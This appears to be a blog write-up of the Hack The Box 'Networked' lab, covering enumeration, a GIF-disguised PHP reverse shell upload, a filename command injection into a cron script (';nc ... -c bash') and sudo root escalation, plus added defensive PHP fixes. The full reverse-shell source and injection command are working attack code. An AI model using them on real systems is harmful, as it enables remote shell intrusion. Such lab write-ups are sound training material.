Hack The Box Networked Writeup – 10.10.10.146

Hack The Box Networked is an easy Linux machine.

Let's start with an nmap port scan, as usual.

 ⚡ ⚙  root@ns09  ~/htb/networked  nmap -sC -sV -p- -oN nmap.txt 10.10.10.146
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 22:08 +03
Nmap scan report for 10.10.10.146
Host is up (0.098s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

I found two open ports: OpenSSH and an Apache web server. Since both services are updated with the latest versions, I thought it was a waste of time to look for exploits against them and concentrated on web server enumeration instead.

The web server does not show much, but I found an interesting hint in the page source.

<html>
<body>
Hello mate, we're building the new FaceMash!</br>
Help by funding us and be the new Tyler&Cameron!</br>
Join us at the pool party this Sat to get a glimpse
<!-- upload and gallery not yet linked -->
</body>
</html>

I knew there had to be something more behind this web server, so I decided to brute-force directories with GoBuster, using the "directory-list-2.3-medium.txt" wordlist. After running for a while, GoBuster discovered a few directories and files:

 ⚡ ⚙  root@ns09  ~/htb/networked  gobuster dir -u http://10.10.10.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100 -o dirs
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.146
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2019/11/14 22:30:23 Starting gobuster
===============================================================
/uploads (Status: 301)
/photos.php (Status: 200)
/index.php (Status: 200)
/upload.php (Status: 200)
/lib.php (Status: 200)
/backup (Status: 301)

I went through the results one by one, starting with /backup because it seemed the most interesting. Navigating to /backup showed a file named backup.tar.

I downloaded backup.tar for further analysis. It contains a couple of PHP files: upload.php and lib.php.

After analyzing upload.php and lib.php I understood that upload.php calls the check_file_type function in lib.php, which in turn calls file_mime_type, also in lib.php. That function relies on PHP's standard library, which inspects the file's magic bytes to decide whether the upload is an image.
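For contrast, here is an added example of my own (not the box's lib.php or upload.php) showing why a magic-bytes check of that kind is not enough on its own, next to a stricter validator. It assumes PHP with the fileinfo and GD extensions; the function names and the sample upload are hypothetical.

```php
<?php
// Added example, not the box's lib.php/upload.php. Assumes the fileinfo and GD
// extensions are loaded; function names are hypothetical.

// Constructed sample: a PHP script with the GIF signature prepended, in the
// style of the upload described in this writeup.
const SAMPLE_DISGUISED = 'GIF89a;<?php echo "not an image";';

// Weak check, modelled on the libmagic-based test the writeup describes:
// libmagic matches the leading bytes only, so the sample is reported as image/gif.
function looks_like_image_weak(string $data): bool
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($data);
    return in_array($mime, ['image/gif', 'image/jpeg', 'image/png'], true);
}

// Stricter validator. Returns the server-chosen name the re-encoded image was
// stored under, or null if the upload is refused.
function store_image_upload(string $original_name, string $data, string $dest_dir): ?string
{
    $allowed = ['gif' => 'image/gif', 'jpg' => 'image/jpeg',
                'jpeg' => 'image/jpeg', 'png' => 'image/png'];

    // 1. Only the final extension counts, and it must be allowlisted.
    //    "12345.php.gif" has the extension "gif", so a name check alone
    //    would not stop that upload either; the later steps do.
    $ext = strtolower(pathinfo($original_name, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }
    // 2. The sniffed type must agree with the declared extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($data);
    if ($mime !== $allowed[$ext]) {
        return null;
    }
    // 3. The whole file must decode as an image. GD parses the complete
    //    stream, so "GIF89a;<?php ..." fails here (false plus a warning).
    $img = @imagecreatefromstring($data);
    if ($img === false) {
        return null;
    }
    // 4. Re-encode into a fresh file under a random name: the uploader's
    //    original bytes never reach disk and the uploader does not choose
    //    the stored name.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($dest_dir, '/') . '/' . $stored;
    if ($ext === 'gif') {
        $ok = imagegif($img, $target);
    } elseif ($ext === 'png') {
        $ok = imagepng($img, $target);
    } else {
        $ok = imagejpeg($img, $target);
    }
    imagedestroy($img);
    return $ok ? $stored : null;
}

var_dump(looks_like_image_weak(SAMPLE_DISGUISED));                                   // bool(true): the sniff check is fooled
var_dump(store_image_upload('12345.php.gif', SAMPLE_DISGUISED, sys_get_temp_dir())); // NULL: refused at step 3
```

Re-encoding (step 4) is the part that matters most: it discards whatever else the original bytes carried. Pair it with an upload directory from which the web server will not execute scripts, since a validator can be bypassed but a directory that only serves static files cannot run a PHP payload.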

I will use my favourite PHP reverse shell (from pentestmonkey) and prepend the GIF magic bytes ("GIF89a") to the start of the file. This makes the MIME-type check PHP is using think it is an image file. 🙂

Here is my final reverse shell script, saved as 12345.php.gif:

GIF89a;
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.3';  // CHANGE THIS
$port = 3333;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
	0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
	1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
	2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}


stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 


The reverse shell was uploaded successfully using /upload.php.

Here is my reverse-shell PHP file disguised as a GIF file.

I started ncat in my terminal and reloaded the photo gallery, and I immediately had a reverse shell as apache.

Privilege Escalation

I have the reverse shell, but as apache, which is a low-privileged user. Looking through the directories I found a user named "guly". Two files in /home/guly seemed interesting to me: crontab.guly and check_attack.php. Reading them, I understood that crontab.guly runs check_attack.php every 3 minutes.

Here is the content of check_attack.php:

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
	$msg='';
	if ($value == 'index.html') {
		continue;
	}
	#echo "-------------\n";
	#print "check: $value\n";
	list ($name,$ext) = getnameCheck($value);
	$check = check_ip($name,$value);
	if (!($check[0])) {
		echo "attack!\n";
		# todo: attach file
		file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
		exec("rm -f $logpath");
		exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
		echo "rm -f $path$value\n";
		mail($to, $msg, $msg, $headers, "-F$value");
	}
}
?>

The script walks the uploads folder and deletes every file that fails its check, which includes the files I uploaded earlier. Looking closely at the code, this line in particular stands out:

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

The $value variable holds the file name and is interpolated unquoted into a shell command, so I can name a file in such a way that it executes code. As user apache I have write access to that directory, so all I need to do is go there and create a file with the appropriate name.

sh-4.2$ cd /var/www/html/uploads
cd /var/www/html/uploads
sh-4.2$ touch ";nc 10.10.14.3 3333 -c bash"

Then I start listening on port 3333 and wait for the cron job to run; in a couple of minutes I have a reverse shell as guly.

nc -nlvp 1235
listening on [any] 1235 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.146] 57202
whoami
guly
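From the defender's side, the fix for that cleanup script is to keep file names out of the shell entirely. The following is an added example of mine, not the box's check_attack.php; the function names are hypothetical and the self-test at the bottom runs in a temporary directory it creates itself.

```php
<?php
// Added example, not the box's check_attack.php. Function names are hypothetical.
//
// The original runs exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &").
// $value comes straight from scandir() on a directory the web user can write
// to, and the string is parsed by /bin/sh, so a name containing ';' ends the
// rm command and starts a second one with the cron job's privileges.

function remove_upload(string $dir, string $value): bool
{
    // scandir() only yields single path components, but be explicit:
    // refuse anything that is not a plain file name inside $dir.
    if ($value === '.' || $value === '..' || basename($value) !== $value
        || strpos($value, "\0") !== false) {
        return false;
    }
    $full = rtrim($dir, '/') . '/' . $value;
    if (!is_file($full) && !is_link($full)) {
        return false;
    }
    // unlink() takes the path as data, not as a command line: ';', '$(', '`'
    // and spaces in $value are just characters in a file name here.
    return unlink($full);
}

// If a shell command really is unavoidable, every user-derived token must be
// passed through escapeshellarg() so it arrives as exactly one argument.
// Compare with the unquoted interpolation in the original.
function build_rm_command(string $dir, string $value): string
{
    return '/bin/rm -f ' . escapeshellarg(rtrim($dir, '/') . '/' . $value);
}

// The original also passes "-F$value" as mail()'s additional_params. That
// string reaches the sendmail command line too, so uploader-controlled data
// should not go there at all; put the file name in the message body instead.
function build_attack_report(string $value): array
{
    return ['subject' => 'attack', 'body' => 'removed upload: ' . $value,
            'headers' => "X-Mailer: check_attack.php\r\n"];
}

// Constructed self-test in a temporary directory (no real uploads touched).
$tmp = sys_get_temp_dir() . '/uploads_' . bin2hex(random_bytes(4));
mkdir($tmp, 0700);
$hostile = ';echo injected';   // a file name in the style the writeup uses
touch($tmp . '/' . $hostile);

var_dump(remove_upload($tmp, $hostile));        // bool(true): file deleted, nothing executed
var_dump(file_exists($tmp . '/' . $hostile));   // bool(false)
var_dump(remove_upload($tmp, '../etc/passwd')); // bool(false): not a plain file name
echo build_rm_command($tmp, $hostile), "\n";    // /bin/rm -f '/tmp/uploads_xxxxxxxx/;echo injected'
rmdir($tmp);
```

Beyond the code, the cron job's privilege level is the other half of the problem: a script that processes files written by the web user should not run as a more privileged account than that user, so that a defect like this one does not become a privilege boundary crossing.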

The user.txt was in guly's home directory:

root@ns09:~# ncat -vlk 3333
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3333
Ncat: Listening on 0.0.0.0:3333
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:43690.
ls
check_attack.php
cowrootx86
crontab.guly
dirtycow
pspy64
user.txt
cat user.txt
526cfc2[---------]2c57d71c5

Getting root.txt

Running "sudo -l" I saw:

sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh

This means I can run /usr/local/sbin/changename.sh as root without a password.

The box is vulnerable to the issue described here: https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f

[guly@networked sbin]$ sudo ./changename.sh
interface NAME:
nav1n was
interface PROXY_METHOD:
here
interface BROWSER_ONLY:
to
interface BOOTPROTO:
rooot
[root@networked]# whoami
root

And I got root.txt:

[root@networked /]# cd root
cd root
[root@networked ~]# cd root
[root@networked ~]# cd root
[root@networked ~]# ls
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
root.txt
[root@networked ~]# ls
ls
root.txt
[root@networked ~]# root.txt
[root@networked ~]# cat root.txt
0a8ecd[----------]0dcb82

Thanks for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
